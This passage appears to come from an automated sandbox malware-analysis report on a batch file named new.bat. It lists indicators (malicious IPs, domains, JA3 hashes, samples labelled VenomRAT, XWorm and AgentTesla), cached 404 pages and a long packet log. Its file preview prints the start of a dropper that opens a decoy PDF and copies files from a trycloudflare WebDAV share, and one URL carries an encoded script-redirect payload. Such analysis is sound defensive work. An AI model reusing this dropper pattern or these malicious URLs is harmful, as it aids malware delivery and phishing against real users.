"The text 'Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.' does not indicate the presence of a login form.",
"The text suggests that the requested URL is not found, which is not related to a login form."
]
}

Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDument to handle the request.

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
70.38.21.234	https://greenwoodpark.com.au/hvilkes-receipt.zip	Get hash	malicious	Unknown	Browse
	https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://tunisianrentcar.tn/jo0eue/9761/new/new/dvader@hinckleyallen.com##	Get hash	malicious	Unknown	Browse
	upload.vbs	Get hash	malicious	VenomRAT	Browse
	update.vbs	Get hash	malicious	XWorm	Browse
	windows.vbs	Get hash	malicious	XWorm	Browse
	file.bat	Get hash	malicious	Unknown	Browse
	file.vbs	Get hash	malicious	Unknown	Browse
239.255.255.250	https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse
	https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://sites.google.com/view/bakcsa3/?yj0&d=DwMFaQ	Get hash	malicious	Unknown	Browse
	https://js.schema-forms.org	Get hash	malicious	Unknown	Browse
	http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3E	Get hash	malicious	Phisher	Browse
	ELECTRONIC RECEIPT_Europait.html	Get hash	malicious	HTMLPhisher	Browse
	https://microsoftedge.microsoft.com/addons/detail/rocketreach-edge-extensio/ldjlhlheoidifojmfkjfijmdhlagakni	Get hash	malicious	Unknown	Browse
	http://al.levels.fyi	Get hash	malicious	Unknown	Browse
	phish_alert_sp2_2.0.0.0-214.eml	Get hash	malicious	Unknown	Browse
	https://mydhl.express.dhl$tracking_link/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s2r.tn	https://greenwoodpark.com.au/hvilkes-receipt.zip	Get hash	malicious	Unknown	Browse	70.38.21.234
	upload.vbs	Get hash	malicious	VenomRAT	Browse	70.38.21.234
	update.vbs	Get hash	malicious	XWorm	Browse	70.38.21.234
	windows.vbs	Get hash	malicious	XWorm	Browse	70.38.21.234
	file.bat	Get hash	malicious	Unknown	Browse	70.38.21.234
	file.vbs	Get hash	malicious	Unknown	Browse	70.38.21.234

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
IWEB-ASCA	IUzBqUNYMK.elf	Get hash	malicious	Unknown	Browse	174.142.183.68
	https://greenwoodpark.com.au/hvilkes-receipt.zip	Get hash	malicious	Unknown	Browse	70.38.21.234
	https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://tunisianrentcar.tn/jo0eue/9761/new/new/dvader@hinckleyallen.com##	Get hash	malicious	Unknown	Browse	70.38.21.234
	WDzkAh06Pf.elf	Get hash	malicious	Mirai	Browse	70.38.94.230
	DHL-2854-56463.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	107.161.75.133
	Statement of account.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	174.142.95.75
	FEDEX DOCS ETD 08 MAY 2024. PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	174.142.95.75
	invoice PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	174.142.95.75
	pDWZMd3100.elf	Get hash	malicious	Mirai, Gafgyt	Browse	174.142.183.72
	Transfer copy PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	174.142.95.75

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://assets-fra.mkt.dynamics.com/0cc4a623-6510-ef11-9f83-002248da15fa/digitalassets/standaloneforms/6e39a88b-9710-ef11-9f89-002248d9c773	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	23.43.61.160 40.127.169.103 13.95.31.18 20.114.59.183 20.12.23.50
	https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	23.43.61.160 40.127.169.103 13.95.31.18 20.114.59.183 20.12.23.50
	https://sites.google.com/view/bakcsa3/?yj0&d=DwMFaQ	Get hash	malicious	Unknown	Browse	23.43.61.160 40.127.169.103 13.95.31.18 20.114.59.183 20.12.23.50
	https://js.schema-forms.org	Get hash	malicious	Unknown	Browse	23.43.61.160 40.127.169.103 13.95.31.18 20.114.59.183 20.12.23.50
	http://0x00003.000375.64090/images.php?p=%31%30%30%35%32%30%30%30%30%36%33%39%22%3E%3C%2F%64%69%76%3E%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%5B%27%72%65%70%6C%61%63%65%27%5D%28%5B%27%68%74%74%70%73%3A%2F%2F%69%6D%70%75%74%65%6C%65%74%74%65%27%2C%20%27%72%2E%63%6F%6D%2F%30%2F%30%2F%30%2F%27%2C%20%27%39%65%36%37%33%38%30%34%63%65%35%37%37%30%32%34%33%32%63%30%65%31%66%65%33%61%63%33%35%38%39%62%27%2C%27/12/101/10542/964/156117/16845%27%5D%5B%27%6A%6F%69%6E%27%5D%28%27%27%29%29%2C%64%6F%63%75%6D%65%6E%74%5B%27%62%6F%64%79%27%5D%5B%27%73%74%79%6C%65%27%5D%5B%27%6F%70%61%63%69%74%79%27%5D%3D%30%78%30%3B%3C%2F%73%63%72%69%70%74%3E	Get hash	malicious	Phisher	Browse	23.43.61.160 40.127.169.103 13.95.31.18 20.114.59.183 20.12.23.50
	ELECTRONIC RECEIPT_Europait.html	Get hash	malicious	HTMLPhisher	Browse	23.43.61.160 40.127.169.103 13.95.31.18 20.114.59.183 20.12.23.50
	http://al.levels.fyi	Get hash	malicious	Unknown	Browse	23.43.61.160 40.127.169.103 13.95.31.18 20.114.59.183 20.12.23.50
	phish_alert_sp2_2.0.0.0-214.eml	Get hash	malicious	Unknown	Browse	23.43.61.160 40.127.169.103 13.95.31.18 20.114.59.183 20.12.23.50
	https://mydhl.express.dhl$tracking_link/	Get hash	malicious	Unknown	Browse	23.43.61.160 40.127.169.103 13.95.31.18 20.114.59.183 20.12.23.50
	https://drive.google.com/drive/folders/1Zsq5Vi6xg6khSGcx49wWM-Q7O4uJNp0w?usp=sharing	Get hash	malicious	Unknown	Browse	23.43.61.160 40.127.169.103 13.95.31.18 20.114.59.183 20.12.23.50

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 46

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	high, very likely benign file
URL:	https://s2r.tn/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 47

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
URL:	https://s2r.tn/cgi/INVOICERVSHA.pdf
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Static File Info

General

File type:	DOS batch file, ASCII text, with CRLF line terminators
Entropy (8bit):	4.99014418879273
TrID:
File name:	new.bat
File size:	1'478 bytes
MD5:	bb09c4b01e76e689822717e2ffdb115d
SHA1:	7c9503233088afa72fde84b872cd11b672ac6131
SHA256:	0ffa30d24d62b4015f54ebe21732d240b252cc391c1d196d913bfff981648455
SHA512:	ce669957a6e64af34b7371a117ffda12d116bbbdd383046c212e76dd7b0ecc78a8967f931db4ee271193dfd72938d97ee7eec13385d41fc73fa6c93350aafaa6
SSDEEP:	24:wKy2N0zOFSMVgAqewoxwbXn6omx4nXX6kkx4XHG4x7XmvnuVM/rRbXpQjQZhQeli:c2Nq7rzox2XZmx4nn3kx43Px72vuMrXU
TLSH:	2A312B93551E8060A2767EF6EB3C16BE5D1810C6D202384870E7D6FF1633D45937BAB8
File Content Preview:	@echo off..setlocal....set source=\\loaded-swift-degrees-packages.trycloudflare.com@SSL\DavWWWRoot\google\Win..set destination=%USERPROFILE%\Downloads....echo Opening PDF file.....start "" "https://s2r.tn/cgi/INVOICERVSHA.pdf"........echo Copying update f

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 18:31:55.305821896 CEST	49675	443	192.168.2.4	173.222.162.32
May 23, 2024 18:32:04.915050030 CEST	49675	443	192.168.2.4	173.222.162.32
May 23, 2024 18:32:05.133110046 CEST	49737	443	192.168.2.4	142.250.185.68
May 23, 2024 18:32:05.133151054 CEST	443	49737	142.250.185.68	192.168.2.4
May 23, 2024 18:32:05.133271933 CEST	49737	443	192.168.2.4	142.250.185.68
May 23, 2024 18:32:05.133997917 CEST	49737	443	192.168.2.4	142.250.185.68
May 23, 2024 18:32:05.134011030 CEST	443	49737	142.250.185.68	192.168.2.4
May 23, 2024 18:32:05.376941919 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.376941919 CEST	49738	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.376990080 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:05.377002001 CEST	443	49738	70.38.21.234	192.168.2.4
May 23, 2024 18:32:05.377058029 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.377058029 CEST	49738	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.377433062 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.377444029 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:05.377624035 CEST	49738	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.377635002 CEST	443	49738	70.38.21.234	192.168.2.4
May 23, 2024 18:32:05.795273066 CEST	443	49737	142.250.185.68	192.168.2.4
May 23, 2024 18:32:05.795898914 CEST	49737	443	192.168.2.4	142.250.185.68
May 23, 2024 18:32:05.795922041 CEST	443	49737	142.250.185.68	192.168.2.4
May 23, 2024 18:32:05.796813011 CEST	443	49737	142.250.185.68	192.168.2.4
May 23, 2024 18:32:05.796926975 CEST	49737	443	192.168.2.4	142.250.185.68
May 23, 2024 18:32:05.797972918 CEST	49737	443	192.168.2.4	142.250.185.68
May 23, 2024 18:32:05.798032999 CEST	443	49737	142.250.185.68	192.168.2.4
May 23, 2024 18:32:05.840059996 CEST	49737	443	192.168.2.4	142.250.185.68
May 23, 2024 18:32:05.840079069 CEST	443	49737	142.250.185.68	192.168.2.4
May 23, 2024 18:32:05.886519909 CEST	49737	443	192.168.2.4	142.250.185.68
May 23, 2024 18:32:05.896405935 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:05.896713972 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.896725893 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:05.897953033 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:05.898461103 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.899708033 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.899708033 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.899722099 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:05.899772882 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:05.949002981 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:05.949028015 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:05.995244026 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.052186966 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.052249908 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.054012060 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.054703951 CEST	49739	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.054719925 CEST	443	49739	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.124121904 CEST	49740	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.124161005 CEST	443	49740	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.124238014 CEST	49740	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.124725103 CEST	49740	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.124735117 CEST	443	49740	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.704372883 CEST	443	49740	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.704669952 CEST	49740	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.704684019 CEST	443	49740	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.705769062 CEST	443	49740	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.712079048 CEST	49740	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.712296963 CEST	443	49740	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.712625980 CEST	49740	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.754555941 CEST	443	49740	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.873572111 CEST	443	49740	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.873742104 CEST	443	49740	70.38.21.234	192.168.2.4
May 23, 2024 18:32:06.873960018 CEST	49740	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.875281096 CEST	49740	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:06.875300884 CEST	443	49740	70.38.21.234	192.168.2.4
May 23, 2024 18:32:07.032152891 CEST	49742	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:07.032191038 CEST	443	49742	23.43.61.160	192.168.2.4
May 23, 2024 18:32:07.032279015 CEST	49742	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:07.056349039 CEST	49742	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:07.056377888 CEST	443	49742	23.43.61.160	192.168.2.4
May 23, 2024 18:32:07.695749998 CEST	443	49742	23.43.61.160	192.168.2.4
May 23, 2024 18:32:07.695830107 CEST	49742	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:07.699675083 CEST	49742	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:07.699687004 CEST	443	49742	23.43.61.160	192.168.2.4
May 23, 2024 18:32:07.699933052 CEST	443	49742	23.43.61.160	192.168.2.4
May 23, 2024 18:32:07.741888046 CEST	49742	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:07.744208097 CEST	49742	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:07.786494017 CEST	443	49742	23.43.61.160	192.168.2.4
May 23, 2024 18:32:08.014031887 CEST	443	49742	23.43.61.160	192.168.2.4
May 23, 2024 18:32:08.014097929 CEST	443	49742	23.43.61.160	192.168.2.4
May 23, 2024 18:32:08.014194012 CEST	49742	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:08.014247894 CEST	49742	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:08.014247894 CEST	49742	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:08.014266014 CEST	443	49742	23.43.61.160	192.168.2.4
May 23, 2024 18:32:08.014276981 CEST	443	49742	23.43.61.160	192.168.2.4
May 23, 2024 18:32:08.047431946 CEST	49743	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:08.047462940 CEST	443	49743	23.43.61.160	192.168.2.4
May 23, 2024 18:32:08.047559977 CEST	49743	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:08.047950029 CEST	49743	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:08.047965050 CEST	443	49743	23.43.61.160	192.168.2.4
May 23, 2024 18:32:08.760380983 CEST	443	49743	23.43.61.160	192.168.2.4
May 23, 2024 18:32:08.760503054 CEST	49743	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:08.762015104 CEST	49743	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:08.762027025 CEST	443	49743	23.43.61.160	192.168.2.4
May 23, 2024 18:32:08.762267113 CEST	443	49743	23.43.61.160	192.168.2.4
May 23, 2024 18:32:08.764646053 CEST	49743	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:08.810493946 CEST	443	49743	23.43.61.160	192.168.2.4
May 23, 2024 18:32:09.058758974 CEST	443	49743	23.43.61.160	192.168.2.4
May 23, 2024 18:32:09.058830976 CEST	443	49743	23.43.61.160	192.168.2.4
May 23, 2024 18:32:09.060729980 CEST	49743	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:09.060729980 CEST	49743	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:09.061450958 CEST	49743	443	192.168.2.4	23.43.61.160
May 23, 2024 18:32:09.061466932 CEST	443	49743	23.43.61.160	192.168.2.4
May 23, 2024 18:32:15.686872959 CEST	443	49737	142.250.185.68	192.168.2.4
May 23, 2024 18:32:15.686933994 CEST	443	49737	142.250.185.68	192.168.2.4
May 23, 2024 18:32:15.686985970 CEST	49737	443	192.168.2.4	142.250.185.68
May 23, 2024 18:32:16.034912109 CEST	49737	443	192.168.2.4	142.250.185.68
May 23, 2024 18:32:16.034939051 CEST	443	49737	142.250.185.68	192.168.2.4
May 23, 2024 18:32:17.730788946 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:17.730819941 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:17.730891943 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:17.732085943 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:17.732103109 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:18.563123941 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:18.563282013 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:18.566750050 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:18.566762924 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:18.567059994 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:18.616950989 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:19.258780956 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:19.306495905 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:19.516527891 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:19.516556025 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:19.516563892 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:19.516576052 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:19.516618013 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:19.516635895 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:19.516658068 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:19.516684055 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:19.516705036 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:19.532650948 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:19.532732964 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:19.532758951 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:19.532784939 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:20.145169020 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:20.145201921 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:20.145220041 CEST	49744	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:20.145227909 CEST	443	49744	20.114.59.183	192.168.2.4
May 23, 2024 18:32:34.503834963 CEST	64815	53	192.168.2.4	162.159.36.2
May 23, 2024 18:32:34.516051054 CEST	53	64815	162.159.36.2	192.168.2.4
May 23, 2024 18:32:34.516160965 CEST	64815	53	192.168.2.4	162.159.36.2
May 23, 2024 18:32:34.526067972 CEST	53	64815	162.159.36.2	192.168.2.4
May 23, 2024 18:32:35.061217070 CEST	64815	53	192.168.2.4	162.159.36.2
May 23, 2024 18:32:35.081783056 CEST	53	64815	162.159.36.2	192.168.2.4
May 23, 2024 18:32:35.081871986 CEST	64815	53	192.168.2.4	162.159.36.2
May 23, 2024 18:32:35.089596987 CEST	64816	443	192.168.2.4	13.95.31.18
May 23, 2024 18:32:35.089623928 CEST	443	64816	13.95.31.18	192.168.2.4
May 23, 2024 18:32:35.089709997 CEST	64816	443	192.168.2.4	13.95.31.18
May 23, 2024 18:32:35.090060949 CEST	64816	443	192.168.2.4	13.95.31.18
May 23, 2024 18:32:35.090074062 CEST	443	64816	13.95.31.18	192.168.2.4
May 23, 2024 18:32:35.383431911 CEST	49738	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:35.393086910 CEST	64817	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:35.393203974 CEST	443	64817	70.38.21.234	192.168.2.4
May 23, 2024 18:32:35.393445015 CEST	64817	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:35.393604994 CEST	64817	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:35.393625975 CEST	443	64817	70.38.21.234	192.168.2.4
May 23, 2024 18:32:35.415353060 CEST	443	49738	70.38.21.234	192.168.2.4
May 23, 2024 18:32:35.415520906 CEST	49738	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:35.923646927 CEST	443	64817	70.38.21.234	192.168.2.4
May 23, 2024 18:32:35.924021006 CEST	64817	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:35.924048901 CEST	443	64817	70.38.21.234	192.168.2.4
May 23, 2024 18:32:35.925204039 CEST	443	64817	70.38.21.234	192.168.2.4
May 23, 2024 18:32:35.925646067 CEST	64817	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:35.925821066 CEST	443	64817	70.38.21.234	192.168.2.4
May 23, 2024 18:32:35.925837040 CEST	64817	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:35.969371080 CEST	443	64816	13.95.31.18	192.168.2.4
May 23, 2024 18:32:35.969464064 CEST	64816	443	192.168.2.4	13.95.31.18
May 23, 2024 18:32:35.970501900 CEST	443	64817	70.38.21.234	192.168.2.4
May 23, 2024 18:32:35.973783970 CEST	64816	443	192.168.2.4	13.95.31.18
May 23, 2024 18:32:35.973799944 CEST	443	64816	13.95.31.18	192.168.2.4
May 23, 2024 18:32:35.974138975 CEST	443	64816	13.95.31.18	192.168.2.4
May 23, 2024 18:32:35.978283882 CEST	64817	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:35.983288050 CEST	64816	443	192.168.2.4	13.95.31.18
May 23, 2024 18:32:36.030503035 CEST	443	64816	13.95.31.18	192.168.2.4
May 23, 2024 18:32:36.077877998 CEST	443	64817	70.38.21.234	192.168.2.4
May 23, 2024 18:32:36.078071117 CEST	443	64817	70.38.21.234	192.168.2.4
May 23, 2024 18:32:36.078134060 CEST	64817	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:36.083280087 CEST	64817	443	192.168.2.4	70.38.21.234
May 23, 2024 18:32:36.083302021 CEST	443	64817	70.38.21.234	192.168.2.4
May 23, 2024 18:32:36.214453936 CEST	443	64816	13.95.31.18	192.168.2.4
May 23, 2024 18:32:36.219351053 CEST	443	64816	13.95.31.18	192.168.2.4
May 23, 2024 18:32:36.219434023 CEST	64816	443	192.168.2.4	13.95.31.18
May 23, 2024 18:32:36.275947094 CEST	64816	443	192.168.2.4	13.95.31.18
May 23, 2024 18:32:36.275991917 CEST	443	64816	13.95.31.18	192.168.2.4
May 23, 2024 18:32:36.276020050 CEST	64816	443	192.168.2.4	13.95.31.18
May 23, 2024 18:32:36.276030064 CEST	443	64816	13.95.31.18	192.168.2.4
May 23, 2024 18:32:36.358577967 CEST	64818	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:36.358640909 CEST	443	64818	20.114.59.183	192.168.2.4
May 23, 2024 18:32:36.358706951 CEST	64818	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:36.359055042 CEST	64818	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:36.359074116 CEST	443	64818	20.114.59.183	192.168.2.4
May 23, 2024 18:32:37.695945024 CEST	64818	443	192.168.2.4	20.114.59.183
May 23, 2024 18:32:37.721848965 CEST	64819	443	192.168.2.4	20.12.23.50
May 23, 2024 18:32:37.721893072 CEST	443	64819	20.12.23.50	192.168.2.4
May 23, 2024 18:32:37.722034931 CEST	64819	443	192.168.2.4	20.12.23.50
May 23, 2024 18:32:37.722460985 CEST	64819	443	192.168.2.4	20.12.23.50
May 23, 2024 18:32:37.722475052 CEST	443	64819	20.12.23.50	192.168.2.4
May 23, 2024 18:32:38.441992044 CEST	443	64819	20.12.23.50	192.168.2.4
May 23, 2024 18:32:38.442128897 CEST	64819	443	192.168.2.4	20.12.23.50
May 23, 2024 18:32:38.458857059 CEST	64819	443	192.168.2.4	20.12.23.50
May 23, 2024 18:32:38.458875895 CEST	443	64819	20.12.23.50	192.168.2.4
May 23, 2024 18:32:38.459661961 CEST	443	64819	20.12.23.50	192.168.2.4
May 23, 2024 18:32:38.460552931 CEST	64819	443	192.168.2.4	20.12.23.50
May 23, 2024 18:32:38.502537012 CEST	443	64819	20.12.23.50	192.168.2.4
May 23, 2024 18:32:38.598829985 CEST	443	64819	20.12.23.50	192.168.2.4
May 23, 2024 18:32:38.598910093 CEST	443	64819	20.12.23.50	192.168.2.4
